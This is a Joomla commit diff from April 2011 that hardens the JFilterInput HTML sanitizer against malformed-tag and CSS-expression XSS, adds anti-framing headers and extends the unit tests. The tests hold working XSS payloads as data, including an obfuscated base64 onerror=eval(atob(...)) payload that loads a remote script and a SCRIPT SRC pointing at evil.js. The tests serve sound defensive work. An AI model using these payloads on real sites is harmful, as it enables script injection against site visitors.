14-Apr-2011
|
14-Apr-2011
|
||||||
# [#25617] performance of assets table query with > 40 articles on website in registered mode
|
# [#25617] performance of assets table query with > 40 articles on website in registered mode
|
||||||
|
|
||||||
|
|
|
@ -279,6 +279,15 @@ class JFilterInput extends JObject
|
||||||
$postTag = substr($postTag, $tagOpen_start);
|
$postTag = substr($postTag, $tagOpen_start);
|
||||||
$fromTagOpen = substr($postTag, 1);
|
$fromTagOpen = substr($postTag, 1);
|
||||||
$tagOpen_end = strpos($fromTagOpen, '>');
|
$tagOpen_end = strpos($fromTagOpen, '>');
|
||||||
|
|
||||||
|
// Check for mal-formed tag where we have a second '<' before the first '>'
|
||||||
|
$nextOpenTag = (strlen($postTag) > $tagOpen_start) ? strpos($postTag, '<', $tagOpen_start + 1) : false;
|
||||||
|
if (($nextOpenTag !== false) && ($nextOpenTag < $tagOpen_end)) {
|
||||||
|
// At this point we have a mal-formed tag -- remove the offending open
|
||||||
|
$postTag = substr($postTag, 0, $tagOpen_start) . substr($postTag, $tagOpen_start + 1);
|
||||||
|
$tagOpen_start = strpos($postTag, '<');
|
||||||
|
continue;
|
||||||
|
}
|
||||||
|
|
||||||
// Let's catch any non-terminated tags and skip over them
|
// Let's catch any non-terminated tags and skip over them
|
||||||
if ($tagOpen_end === false) {
|
if ($tagOpen_end === false) {
|
||||||
|
@ -566,13 +575,19 @@ class JFilterInput extends JObject
|
||||||
$escapedChars = array ('<', '"', '>');
|
$escapedChars = array ('<', '"', '>');
|
||||||
// Process each portion based on presence of =" and "<space>, "/>, or ">
|
// Process each portion based on presence of =" and "<space>, "/>, or ">
|
||||||
// See if there are any more attributes to process
|
// See if there are any more attributes to process
|
||||||
while (preg_match('#\s*=\s*\"#', $remainder, $matches, PREG_OFFSET_CAPTURE))
|
while (preg_match('#\s*=\s*(\"|\')#', $remainder, $matches, PREG_OFFSET_CAPTURE))
|
||||||
{
|
{
|
||||||
// get the portion before the attribute value
|
// get the portion before the attribute value
|
||||||
$quotePosition = $matches[0][1];
|
$quotePosition = $matches[0][1];
|
||||||
$nextBefore = $quotePosition + strlen($matches[0][0]);
|
$nextBefore = $quotePosition + strlen($matches[0][0]);
|
||||||
|
|
||||||
|
// Figure out if we have a single or double quote and look for the matching closing quote
|
||||||
|
// Closing quote should be "/>, ">, "<space>, or " at the end of the string
|
||||||
|
$quote = substr($matches[0][0], -1);
|
||||||
|
$pregMatch = ($quote == '"') ? '#(\"\s*/\s*>|\"\s*>|\"\s+|\"$)#' : "#(\'\s*/\s*>|\'\s*>|\'\s+|\'$)#";
|
||||||
|
|
||||||
// get the portion after attribute value
|
// get the portion after attribute value
|
||||||
if (preg_match('#(\"\s*/\s*>|\"\s*>|\"\s+|\"$)#', substr($remainder, $nextBefore), $matches, PREG_OFFSET_CAPTURE)) {
|
if (preg_match($pregMatch, substr($remainder, $nextBefore), $matches, PREG_OFFSET_CAPTURE)) {
|
||||||
// We have a closing quote
|
// We have a closing quote
|
||||||
$nextAfter = $nextBefore + $matches[0][1];
|
$nextAfter = $nextBefore + $matches[0][1];
|
||||||
} else {
|
} else {
|
||||||
|
@ -583,11 +598,40 @@ class JFilterInput extends JObject
|
||||||
$attributeValue = substr($remainder, $nextBefore, $nextAfter - $nextBefore);
|
$attributeValue = substr($remainder, $nextBefore, $nextAfter - $nextBefore);
|
||||||
// Escape bad chars
|
// Escape bad chars
|
||||||
$attributeValue = str_replace($badChars, $escapedChars, $attributeValue);
|
$attributeValue = str_replace($badChars, $escapedChars, $attributeValue);
|
||||||
$alreadyFiltered .= substr($remainder, 0, $nextBefore) . $attributeValue . '"';
|
$attributeValue = $this->_stripCSSExpressions($attributeValue);
|
||||||
|
$alreadyFiltered .= substr($remainder, 0, $nextBefore) . $attributeValue . $quote;
|
||||||
$remainder = substr($remainder, $nextAfter + 1);
|
$remainder = substr($remainder, $nextAfter + 1);
|
||||||
}
|
}
|
||||||
|
|
||||||
// At this point, we just have to return the $alreadyFiltered and the $remainder
|
// At this point, we just have to return the $alreadyFiltered and the $remainder
|
||||||
return $alreadyFiltered . $remainder;
|
return $alreadyFiltered . $remainder;
|
||||||
}
|
}
|
||||||
|
/**
|
||||||
|
* Remove CSS Expressions in the form of <property>:expression(...)
|
||||||
|
*
|
||||||
|
* @param string $source The source string.
|
||||||
|
* @return string Filtered string
|
||||||
|
* @since 1.6
|
||||||
|
*/
|
||||||
|
protected function _stripCSSExpressions($source)
|
||||||
|
{
|
||||||
|
// Strip any comments out (in the form of /*...*/)
|
||||||
|
$test = preg_replace('#\/\*.*\*\/#U', '', $source);
|
||||||
|
// Test for :expression
|
||||||
|
if (!stripos($test, ':expression')) {
|
||||||
|
// Not found, so we are done
|
||||||
|
$return = $source;
|
||||||
|
}
|
||||||
|
else {
|
||||||
|
// At this point, we have stripped out the comments and have found :expression
|
||||||
|
// Test stripped string for :expression followed by a '('
|
||||||
|
if (preg_match_all('#:expression\s*\(#', $test, $matches)) {
|
||||||
|
// If found, remove :expression
|
||||||
|
$test = str_ireplace(':expression', '', $test);
|
||||||
|
$return = $test;
|
||||||
|
}
|
||||||
|
}
|
||||||
|
return $return;
|
||||||
|
}
|
||||||
|
|
||||||
}
|
}
|
||||||
|
|
|
@ -660,10 +660,13 @@ abstract class JHtmlBehavior
|
||||||
// Include mootools framework
|
// Include mootools framework
|
||||||
self::framework();
|
self::framework();
|
||||||
|
|
||||||
$js = "window.addEvent('domready', function () {if (top != self) {top.location.replace(".$location.");}});";
|
$js = "window.addEvent('domready', function () {if (top == self) {document.documentElement.style.display = 'block'; } else {top.location = self.location; }});";
|
||||||
$document = JFactory::getDocument();
|
$document = JFactory::getDocument();
|
||||||
|
$document->addStyleDeclaration('html { display:none }');
|
||||||
$document->addScriptDeclaration($js);
|
$document->addScriptDeclaration($js);
|
||||||
|
|
||||||
|
JResponse::setHeader('X-Frames-Options', 'SAME-ORIGIN');
|
||||||
|
JResponse::setHeader('X-Content-Security-Policy', 'frame-ancestors \'self\'');
|
||||||
$loaded = true;
|
$loaded = true;
|
||||||
}
|
}
|
||||||
|
|
||||||
|
|
|
@ -24,13 +24,13 @@ class JVersion
|
||||||
/** @public string Development Status */
|
/** @public string Development Status */
|
||||||
public $DEV_STATUS = 'Stable';
|
public $DEV_STATUS = 'Stable';
|
||||||
/** @public int Sub Release Level */
|
/** @public int Sub Release Level */
|
||||||
public $DEV_LEVEL = '1';
|
public $DEV_LEVEL = '2';
|
||||||
/** @public int build Number */
|
/** @public int build Number */
|
||||||
public $BUILD = '';
|
public $BUILD = '';
|
||||||
/** @public string Codename */
|
/** @public string Codename */
|
||||||
public $CODENAME = 'Onward';
|
public $CODENAME = 'Onward';
|
||||||
/** @public string Date */
|
/** @public string Date */
|
||||||
public $RELDATE = '07-Mar-2011';
|
public $RELDATE = '14-Apr-2011';
|
||||||
/** @public string Time */
|
/** @public string Time */
|
||||||
public $RELTIME = '23:00';
|
public $RELTIME = '23:00';
|
||||||
/** @public string Timezone */
|
/** @public string Timezone */
|
||||||
|
|
|
@ -3,6 +3,8 @@
|
||||||
* PHPMailer language file.
|
* PHPMailer language file.
|
||||||
* English Version
|
* English Version
|
||||||
*/
|
*/
|
||||||
|
// no direct access
|
||||||
|
defined('_JEXEC') or die;
|
||||||
|
|
||||||
$PHPMAILER_LANG = array();
|
$PHPMAILER_LANG = array();
|
||||||
|
|
||||||
|
|
|
@ -311,6 +311,30 @@ class JFilterInputTest extends PHPUnit_Framework_TestCase
|
||||||
'123.567',
|
'123.567',
|
||||||
'From generic cases'
|
'From generic cases'
|
||||||
),
|
),
|
||||||
|
'string_single_quote' => array(
|
||||||
|
'string',
|
||||||
|
"this is a 'test' of ?",
|
||||||
|
"this is a 'test' of ?",
|
||||||
|
'From generic cases'
|
||||||
|
),
|
||||||
|
'string_double_quote' => array(
|
||||||
|
'string',
|
||||||
|
'this is a "test" of "double" quotes',
|
||||||
|
'this is a "test" of "double" quotes',
|
||||||
|
'From generic cases'
|
||||||
|
),
|
||||||
|
'string_odd_double_quote' => array(
|
||||||
|
'string',
|
||||||
|
'this is a "test of "odd number" of quotes',
|
||||||
|
'this is a "test of "odd number" of quotes',
|
||||||
|
'From generic cases'
|
||||||
|
),
|
||||||
|
'string_odd_mixed_quote' => array(
|
||||||
|
'string',
|
||||||
|
'this is a "test\' of "odd number" of quotes',
|
||||||
|
'this is a "test\' of "odd number" of quotes',
|
||||||
|
'From generic cases'
|
||||||
|
),
|
||||||
'unknown_01' => array(
|
'unknown_01' => array(
|
||||||
'',
|
'',
|
||||||
'123.567',
|
'123.567',
|
||||||
|
@ -356,7 +380,7 @@ class JFilterInputTest extends PHPUnit_Framework_TestCase
|
||||||
'Malformed Nested tags' => array(
|
'Malformed Nested tags' => array(
|
||||||
'',
|
'',
|
||||||
'<em><strongFred</strong></em>',
|
'<em><strongFred</strong></em>',
|
||||||
'<em><strongFred</strong></em>',
|
'<em>strongFred</strong></em>',
|
||||||
'From generic cases'
|
'From generic cases'
|
||||||
),
|
),
|
||||||
'Unquoted Attribute Without Space' => array(
|
'Unquoted Attribute Without Space' => array(
|
||||||
|
@ -413,6 +437,12 @@ class JFilterInputTest extends PHPUnit_Framework_TestCase
|
||||||
'<img class="one two" />',
|
'<img class="one two" />',
|
||||||
'Test for recursion with single tags - From generic cases'
|
'Test for recursion with single tags - From generic cases'
|
||||||
),
|
),
|
||||||
|
'missing_quote' => array(
|
||||||
|
'string',
|
||||||
|
'<img height="123 />',
|
||||||
|
'img height="123 />"',
|
||||||
|
'From generic cases'
|
||||||
|
),
|
||||||
);
|
);
|
||||||
}
|
}
|
||||||
|
|
||||||
|
@ -662,7 +692,37 @@ class JFilterInputTest extends PHPUnit_Framework_TestCase
|
||||||
'<img class="one two" />',
|
'<img class="one two" />',
|
||||||
'<img />',
|
'<img />',
|
||||||
'From specific cases'
|
'From specific cases'
|
||||||
)
|
),
|
||||||
|
'security_20110329a' => array(
|
||||||
|
'string',
|
||||||
|
"<img src='<img src='///'/> ",
|
||||||
|
'<img /> ',
|
||||||
|
'From specific cases'
|
||||||
|
),
|
||||||
|
'security_20110329b' => array(
|
||||||
|
'string',
|
||||||
|
"<img src='<img src='/onerror=eval(atob(/KGZ1bmN0aW9uKCl7dHJ5e3ZhciBkPWRvY3VtZW50LGI9ZC5ib2R5LHM9ZC5jcmVhdGVFbGVtZW50KCdzY3JpcHQnKTtzLnNldEF0dHJpYnV0ZSgnc3JjJywnaHR0cDovL2hhLmNrZXJzLm9yZy94c3MuanMnKTtiLmFwcGVuZENoaWxkKHMpO31jYXRjaChlKXt9fSkoKTs=/.source))//'/> ",
|
||||||
|
'<img /> ',
|
||||||
|
'From specific cases'
|
||||||
|
),
|
||||||
|
'hanging_quote' => array(
|
||||||
|
'string',
|
||||||
|
"<img src=\' />",
|
||||||
|
'<img />',
|
||||||
|
'From specific cases'
|
||||||
|
),
|
||||||
|
'hanging_quote2' => array(
|
||||||
|
'string',
|
||||||
|
'<img src slkdjls " this is "more " stuff',
|
||||||
|
'img src slkdjls " this is "more " stuff',
|
||||||
|
'From specific cases'
|
||||||
|
),
|
||||||
|
'hanging_quote3' => array(
|
||||||
|
'string',
|
||||||
|
"<img src=\"\'\" />",
|
||||||
|
'<img />',
|
||||||
|
'From specific cases'
|
||||||
|
),
|
||||||
);
|
);
|
||||||
$tests = array_merge($this->casesGeneric(), $casesSpecific);
|
$tests = array_merge($this->casesGeneric(), $casesSpecific);
|
||||||
|
|
||||||
|
@ -954,7 +1014,7 @@ class JFilterInputTest extends PHPUnit_Framework_TestCase
|
||||||
'security_tracker_24802_e' => array(
|
'security_tracker_24802_e' => array(
|
||||||
'',
|
'',
|
||||||
'<img src=<img src=x"/onerror=alert(1)//">',
|
'<img src=<img src=x"/onerror=alert(1)//">',
|
||||||
'<img src=<img src="x/onerror=alert(1)//" />',
|
'img src=<img src="x/onerror=alert(1)//" />',
|
||||||
'From specific cases'
|
'From specific cases'
|
||||||
),
|
),
|
||||||
'empty_alt' => array(
|
'empty_alt' => array(
|
||||||
|
@ -1023,6 +1083,60 @@ class JFilterInputTest extends PHPUnit_Framework_TestCase
|
||||||
'<p class="my_class">This is a <a href="http://mysite.com" img="my_image">link test</a>. This is <span class="myclass" font="myfont"> some more</span> text.</p>',
|
'<p class="my_class">This is a <a href="http://mysite.com" img="my_image">link test</a>. This is <span class="myclass" font="myfont"> some more</span> text.</p>',
|
||||||
'Test valid nested tag'
|
'Test valid nested tag'
|
||||||
),
|
),
|
||||||
|
'hanging_quote' => array(
|
||||||
|
'string',
|
||||||
|
"<img src=\' />",
|
||||||
|
'<img src="" />',
|
||||||
|
'From specific cases'
|
||||||
|
),
|
||||||
|
'hanging_quote2' => array(
|
||||||
|
'string',
|
||||||
|
'<img src slkdjls " this is "more " stuff',
|
||||||
|
'img src slkdjls " this is "more " stuff',
|
||||||
|
'From specific cases'
|
||||||
|
),
|
||||||
|
'hanging_quote3' => array(
|
||||||
|
'string',
|
||||||
|
"<img src=\"\' />",
|
||||||
|
'img src="\\\' />"',
|
||||||
|
'From specific cases'
|
||||||
|
),
|
||||||
|
'tracker25558a' => array(
|
||||||
|
'string',
|
||||||
|
'<SCRIPT SRC=http://jeffchannell.com/evil.js#<B />',
|
||||||
|
'SCRIPT SRC=http://jeffchannell.com/evil.js#<B />',
|
||||||
|
'Test mal-formed element from 25558a'
|
||||||
|
),
|
||||||
|
'tracker25558b' => array(
|
||||||
|
'string',
|
||||||
|
'<IMG STYLE="xss:expression(alert(\'XSS\'))" />',
|
||||||
|
'<IMG STYLE="xss(alert(\'XSS\'))" />',
|
||||||
|
'Test mal-formed element from 25558b'
|
||||||
|
),
|
||||||
|
'tracker25558c' => array(
|
||||||
|
'string',
|
||||||
|
'<IMG STYLE="xss:expr/*XSS*/ession(alert(\'XSS\'))" />',
|
||||||
|
'<IMG STYLE="xss(alert(\'XSS\'))" />',
|
||||||
|
'Test mal-formed element from 25558b'
|
||||||
|
),
|
||||||
|
'tracker25558d' => array(
|
||||||
|
'string',
|
||||||
|
'<IMG STYLE="xss:expr/*XSS*/ess/*another comment*/ion(alert(\'XSS\'))" />',
|
||||||
|
'<IMG STYLE="xss(alert(\'XSS\'))" />',
|
||||||
|
'Test mal-formed element from 25558b'
|
||||||
|
),
|
||||||
|
'tracker25558e' => array(
|
||||||
|
'string',
|
||||||
|
'<b><script<b></b><alert(1)</script </b>',
|
||||||
|
'<b>script<b></b>alert(1)/script</b>',
|
||||||
|
'Test mal-formed element from 25558e'
|
||||||
|
),
|
||||||
|
'security_20110329a' => array(
|
||||||
|
'string',
|
||||||
|
"<img src='<img src='///'/> ",
|
||||||
|
"<img src=\"'<img\" src=\"'///'/\" /> ",
|
||||||
|
'From specific cases'
|
||||||
|
),
|
||||||
);
|
);
|
||||||
$tests = array_merge($this->casesGeneric(), $casesSpecific);
|
$tests = array_merge($this->casesGeneric(), $casesSpecific);
|
||||||
|
|
||||||
|
@ -1112,7 +1226,14 @@ class JFilterInputTest extends PHPUnit_Framework_TestCase
|
||||||
'<img class="one two" />',
|
'<img class="one two" />',
|
||||||
'',
|
'',
|
||||||
'From specific cases'
|
'From specific cases'
|
||||||
)
|
),
|
||||||
|
'security_20110328' => array(
|
||||||
|
'string',
|
||||||
|
"<img src='<img
|
||||||
|
src='/onerror=eval(atob(/KGZ1bmN0aW9uKCl7dHJ5e3ZhciBkPWRvY3VtZW50LGI9ZC5ib2R5LHM9ZC5jcmVhdGVFbGVtZW50KCdzY3JpcHQnKTtzLnNldEF0dHJpYnV0ZSgnc3JjJywnaHR0cDovL2hhLmNrZXJzLm9yZy94c3MuanMnKTtiLmFwcGVuZENoaWxkKHMpO31jYXRjaChlKXt9fSkoKTs=/.source))//'/> ",
|
||||||
|
' ',
|
||||||
|
'From specific cases'
|
||||||
|
),
|
||||||
);
|
);
|
||||||
$tests = array_merge($this->casesGeneric(), $casesSpecific);
|
$tests = array_merge($this->casesGeneric(), $casesSpecific);
|
||||||
|
|
||||||
|
|
Loading…
Reference in New Issue
Block a user